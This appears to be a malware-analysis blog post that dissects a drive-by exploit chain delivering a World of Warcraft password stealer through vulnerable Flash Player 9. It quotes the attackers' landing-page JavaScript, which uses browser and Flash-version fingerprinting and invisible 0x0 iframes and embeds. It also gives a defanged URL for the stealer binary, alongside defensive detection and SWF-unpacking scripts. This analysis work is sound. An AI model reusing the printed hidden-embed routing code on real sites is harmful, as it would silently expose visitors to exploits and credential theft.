I recently stumbled across an article on the Internet Storm Center about (v9/10) Flash files (SWF) which exploit your browser and install a World of Warcraft password stealer. So let's take a closer look at what happens there. The URL which serves the SWF files is hxxp://www_svc7_com/1.html (don't visit the site unless you know what you are doing).
What I did was a simple wget with a disabled user-agent string to retrieve 1.html. This file contains some JavaScript code to determine which browser is visiting and then includes another file (an iframe for Internet Explorer, an EMBED tag otherwise). Part of the script looks like this:
[...]
// user-agent sniffing: route Internet Explorer to the ASP page, everything else straight to a SWF
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
// invisible iframe (width=0 height=0) so the victim sees nothing
document.write('<iframe src="b.asp" width=0 height=0></iframe>');
} else {
document.write('<EMBED src="dadongf.swf" width=0 height=0>');
}
[...]
Thus, if Internet Explorer is used, the b.asp file is included, otherwise dadongf.swf. So let's take a closer look at the ASP file. It includes further JavaScript code to determine the Flash Player version that is running. At the time of this writing the ASP file checks whether the major player version is 9, then checks the minor version and serves a different SWF file for each minor version. Thus, Flash Players of version 8 or earlier, or version 10 and higher, are not exploited. The following is part of the ASP file:
[...]
if (version['major'] == 9)
{
document.getElementById('flashversion').innerHTML = "";
// 9e
if (version['rev'] == 115)
{
var so = new SWFObject("./9e.swf", "mymovie", "0.1", "0.1", "9", "#000000");
so.write("flashcontent");
document.write('<EMBED src="9e10.swf" width=0 height=0>');
}
// 9c/d
else if (version['rev'] == 47)
{
var so = new SWFObject("./47.swf", "mymovie", "0.1", "0.1", "9", "#000000");
so.write("flashcontent");
}
[...]
In total the script checks for seven different minor versions of Flash Player 9 and serves a different SWF file accordingly. The next step is to download the SWF files and see if we can find any malicious download URLs within. To retrieve the files we use wget again.
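The two landing-page fragments quoted above share a pattern a defender can look for when triaging saved web pages: fingerprinting script (user-agent or Flash version checks) combined with an iframe or EMBED sized 0x0. The following Python script is an added example, not code from the original post or from the site being analysed; it scans raw HTML for those two signals and flags pages that show both. The two embedded sample pages are constructed re-creations of the quoted fragments, and the regular expressions are my own choice, not any tool's built-in rules.

```python
import re

# Constructed sample 1: re-creation of the user-agent sniffing fragment from 1.html.
SAMPLE_LANDING_PAGE = r"""
<html><body>
<script>
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write('<iframe src="b.asp" width=0 height=0></iframe>');
} else {
document.write('<EMBED src="dadongf.swf" width=0 height=0>');
}
</script>
<embed src="intro.swf" width="300" height="200">
</body></html>
"""

# Constructed sample 2: re-creation of the Flash-version routing fragment from b.asp.
SAMPLE_VERSION_PAGE = r"""
<script>
if (version['major'] == 9)
{
if (version['rev'] == 115)
{
var so = new SWFObject("./9e.swf", "mymovie", "0.1", "0.1", "9", "#000000");
so.write("flashcontent");
document.write('<EMBED src="9e10.swf" width=0 height=0>');
}
}
</script>
"""

# Matches an iframe or embed tag even when it is buried inside a document.write() string.
TAG_RE = re.compile(r"<(iframe|embed)\b([^>]*)>", re.IGNORECASE)
# Attribute parser: name=value with double quotes, single quotes or no quotes at all.
ATTR_RE = re.compile(r"""([a-zA-Z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>'"]+))""")

# Fingerprinting markers (hypothetical names chosen for this example).
FINGERPRINT_MARKERS = {
    "ua_sniff": re.compile(r"navigator\.userAgent", re.IGNORECASE),
    "flash_version": re.compile(r"""SWFObject|version\[['"](?:major|rev)['"]\]""", re.IGNORECASE),
}


def parse_attrs(attr_text):
    """Return a dict of lower-cased attribute names to their unquoted values."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        value = next(g for g in m.groups()[1:] if g is not None)
        attrs[m.group(1).lower()] = value
    return attrs


def is_zero(value):
    """True for width/height values that make the element invisible (0 or 0px)."""
    return value is not None and value.strip().lower() in ("0", "0px")


def find_hidden_embeds(html):
    """Return [(tag, src)] for every iframe/embed with width=0 and height=0."""
    hits = []
    for m in TAG_RE.finditer(html):
        attrs = parse_attrs(m.group(2))
        if is_zero(attrs.get("width")) and is_zero(attrs.get("height")):
            hits.append((m.group(1).lower(), attrs.get("src", "")))
    return hits


def fingerprint_markers(html):
    """Sorted names of the fingerprinting markers present in the page."""
    return sorted(name for name, rx in FINGERPRINT_MARKERS.items() if rx.search(html))


def triage(html):
    """Flag a page as suspicious when it both fingerprints the client and hides a payload."""
    hidden = find_hidden_embeds(html)
    markers = fingerprint_markers(html)
    return {"hidden_embeds": hidden, "markers": markers,
            "suspicious": bool(hidden) and bool(markers)}


if __name__ == "__main__":
    for name, page in (("1.html", SAMPLE_LANDING_PAGE), ("b.asp", SAMPLE_VERSION_PAGE)):
        print(name, triage(page))
```

Run over a directory of saved landing pages, the `suspicious` flag is a cheap first filter; the visible 300x200 embed in the first sample is deliberately left unflagged to show that the 0x0 size, not the embed itself, is the signal.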
As already mentioned in the Internet Storm Center article, the swfdump tool does not work with SWF files of version 9 and greater, so we use another tool called flasm. The tool can decompress the compressed Flash file for us. Thus we use the following command to decompress the SWF files:
flasm -x 9e.swf
The resulting decompressed file can then be analyzed with the Linux tool strings to retrieve any printable data. The following is the information we were looking for right from the start: a URL to the actual malware binary, the World of Warcraft password stealer.
hxxp://vjd6_cn/lo/bigfots_exe
The Virustotal report for this file can be found at Virustotal.
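What flasm -x and strings do in the steps above can be reproduced without either tool, which is handy when you want to triage many SWF files or run this inside a sandbox pipeline. The script below is an added example, not code from the post or from flasm: it reads the 8-byte SWF header (signature FWS/CWS/ZWS, version byte, declared uncompressed length), inflates a CWS body with zlib, pulls printable strings out of it and reports any URLs defanged in the same hxxp/underscore style the post uses. The sample SWF it builds is constructed in memory around a placeholder URL (example.invalid), so nothing on disk or on the network is touched; the helper names are my own.

```python
import re
import struct
import zlib

SAMPLE_URL = b"http://example.invalid/lo/sample.exe"  # constructed placeholder, not a real host
STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")             # runs of printable ASCII, like strings(1)
URL_RE = re.compile(r"(?:https?|ftp)://[^\s\"'<>]+")


def build_sample_body():
    """Constructed stand-in for a decompressed SWF body: binary padding around one ASCII URL."""
    return (b"\x78\x00\x05\x5f\x00\x00\x0f\xa0" + b"\x0c\x00\x01\x00" + b"\x00" * 12
            + SAMPLE_URL + b"\x00" + b"bin\x00" + b"\x01\x02" * 8)


def build_sample_swf(compressed=True, version=9):
    """Wrap the sample body in a CWS (zlib) or FWS (plain) header with a correct length field."""
    body = build_sample_body()
    header = struct.pack("<I", 8 + len(body))  # declared length covers the header too
    if compressed:
        return b"CWS" + bytes([version]) + header + zlib.compress(body, 9)
    return b"FWS" + bytes([version]) + header + body


def decompress_swf(data):
    """Return (version, declared_length, body, was_compressed) for an FWS or CWS file."""
    if len(data) < 8:
        raise ValueError("too short to be a SWF")
    sig, version = data[:3], data[3]
    declared_len = struct.unpack("<I", data[4:8])[0]
    if sig == b"FWS":
        return version, declared_len, data[8:], False
    if sig == b"CWS":
        return version, declared_len, zlib.decompress(data[8:]), True
    if sig == b"ZWS":
        # LZMA-compressed SWF (version 13 and later); out of scope for this example.
        raise NotImplementedError("ZWS (LZMA) SWF not handled here")
    raise ValueError("not a SWF file: signature %r" % sig)


def extract_strings(body, min_len=4):
    """Printable ASCII runs of at least min_len bytes, decoded to str."""
    return [m.group(0).decode("ascii") for m in STRING_RE.finditer(body)
            if len(m.group(0)) >= min_len]


def extract_urls(strings):
    """Unique URLs found inside the extracted strings, in order of appearance."""
    seen, urls = set(), []
    for s in strings:
        for u in URL_RE.findall(s):
            if u not in seen:
                seen.add(u)
                urls.append(u)
    return urls


def defang(url):
    """hxxp:// and underscores for dots, matching the notation used in the post."""
    return url.replace("http", "hxxp").replace(".", "_")


def analyze_swf(data):
    """One-shot triage: header facts plus defanged URLs from the decompressed body."""
    version, declared_len, body, was_compressed = decompress_swf(data)
    urls = extract_urls(extract_strings(body))
    return {
        "version": version,
        "compressed": was_compressed,
        # A mismatch means a truncated download or a deliberately bogus header.
        "length_ok": declared_len == 8 + len(body),
        "urls": [defang(u) for u in urls],
    }


if __name__ == "__main__":
    print(analyze_swf(build_sample_swf()))
```

The length check is the one thing strings alone will not tell you: a CWS whose inflated size disagrees with the header is either cut off in transit or was written by a packer that does not care about the field, and both are worth noting in the report.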